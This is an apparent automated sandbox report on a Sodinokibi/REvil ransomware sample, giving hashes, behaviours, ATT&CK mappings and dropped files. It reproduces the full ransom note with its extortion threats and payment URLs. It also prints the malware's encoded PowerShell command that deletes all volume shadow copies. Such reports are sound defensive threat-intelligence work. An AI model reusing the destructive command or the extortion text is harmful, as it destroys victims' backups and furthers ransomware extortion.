Analysis

  • max time kernel
    125s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2023 07:35

General

  • Target

    adb.vbs.exe

  • Size

    116KB

  • MD5

    b86ad4241b01376b3924a380f6f4c934

  • SHA1

    10682d08a18715a79ee23b58fdb6ee44c4e28c61

  • SHA256

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

  • SHA512

    54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9

  • SSDEEP

    1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Score
10/10

Malware Config

Extracted

Path

C:\Recovery\5myuz6ci-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5myuz6ci. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4EA0548D3417256B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/4EA0548D3417256B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 1ldHvOB7HKJsKHzevrmfTNkxNVF2JJ6/wSHOm3p8hOTD1IJm5vs/6o46aFsrk2pX 5+rhciRml/nLd6lAnIlPkV6Xyl021nqaZYPIJpYp1Dq7WFGibAVZIIKrRogE4SDy db5peCEJVsYdPN0q9zq4+HS+GqRI9BFJQF+gEJZ5VacPeKeQvf0XhptzbdKBqNcm a8qghi0bratMjct4vfK+C3Wd/C/W3jnd3gSj6iAA/sR1X30GuG77+pt/753bdI2s lhT1Qck2mUnOMS+orM40XJRJQn2WED/mzDlGzdGRNwJNcZmbeMGlxtkLBS+4Qbzm +HWx21q63XZwF70Jt8PPfZ5Lzy3iz1Z98W5kRpMEznRKdTPLaU4khRPG++DjcUqW KTQU3LqEY9JybKZN1eF2yygeAbmyVlLFrHO57TePxQYTg5lSprc/1yKl09G5wI8n QGHNSl28vwElJHDh/8TBbxJ302DANumQa0jn5jS1pqqTxQ6BINS5AV86geN7cFuL aZ2J9LaXi992QYFEHIMCVUiseEIVgpvK/B9GyoSTCE0l4Kg+s69whTSt0I9GI7uN XQYNi6bDxaSsw9fLwepeDGvv3LCt/mv6bIh2diCNzbx3Rk9oEKqRDL16QnlEUPgv xJ+sEdF/crdf+ybQkCIymhI69cX0WVMWS/0wifuRbWtq4ZmtRuqWWE7VdJK9KXYV PwsgStUYWnB9Nu/L94OIclxvXHNQuMVCwP1GM0rq+pukWAJxxueMx/ufZJtirtyG 00/TeH80L4Nu8zO0798+xD0O/KwV+DdYKwD38sd2QAxjh99fLq2Z5VME4s+ErV1P myC7q+sS80hUXFjPUIFlZRDoWlxqpc50dxP4wFMCsNkaIasXp4NA5J87JBzhZ5TC MvYTCXaOtet1+QUjhPmEzSfNWXZn9FnliXDTwW5ZEbLpglyJ9qGYrWj+DMiCVK5H GJ/mni7cGndvvsYfothj5TRM8aRNntC/x268zs1eyAN1z5lFWs0+IMS96QYaZl4t SbaSQqOPt0n1mvPgbvuWSYUuLSj21Qg8P97zxFvheSOcjYOftQKCWS7chNrmlldm A6+2yeHkgbm2kHAU68tO/OeOO0CBLUSTa9h6kqp0L2r03pWhlxMOlMSQVq9fl/Lo uTGMWmgu5NHY0Lqr0e4XMbEKpqeN+92MurnLkKGPdpETBur8WVFz50msPUG0YIl2 iGPsgXZsJJWEqeDgZuP2T05tNuOcE2Z0oaC9MIfbk8d1OM9yc/MBV1kblplsV1bO tPrPZdq+btdm++3u8eCyzyVbTEH2xw7z/TS/0nvNL/N30Q4yvMf7Y6BJ1t7C3I56 2izYg6D5qaMRnTcKaklIT3G9qLzgPouiTJNL3wiQbuBXsB3BENoPMoTy ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4EA0548D3417256B

http://decryptor.cc/4EA0548D3417256B

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3208
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:5012
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3616

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\5myuz6ci-readme.txt
      Filesize

      7KB

      MD5

      08b82cbcd7604cbadb77c969c72b3213

      SHA1

      1a200851e58f2c5119f9aeba2182396a5a0cfc3f

      SHA256

      f879d65f8677f3094b7f2a520863e0493fd64708feb49efec71785b1d4712d79

      SHA512

      76d3f5bdf8840b6bf819dc1fb544a4b3f886b885e0794d5d76fa6d873a6bfd90a17dc1048bb726a41e82a50be8faaeaad6f62d0c63b0f297c634c3b785df6e57

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aatp2fxh.w2y.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/3208-138-0x000001EE3DD30000-0x000001EE3DD52000-memory.dmp
      Filesize

      136KB

    • memory/3208-143-0x00007FFCB4E80000-0x00007FFCB5941000-memory.dmp
      Filesize

      10MB

    • memory/3208-144-0x000001EE3DDA0000-0x000001EE3DDB0000-memory.dmp
      Filesize

      64KB

    • memory/3208-145-0x000001EE3DDA0000-0x000001EE3DDB0000-memory.dmp
      Filesize

      64KB

    • memory/3208-146-0x000001EE3DDA0000-0x000001EE3DDB0000-memory.dmp
      Filesize

      64KB

    • memory/3208-149-0x00007FFCB4E80000-0x00007FFCB5941000-memory.dmp
      Filesize

      10MB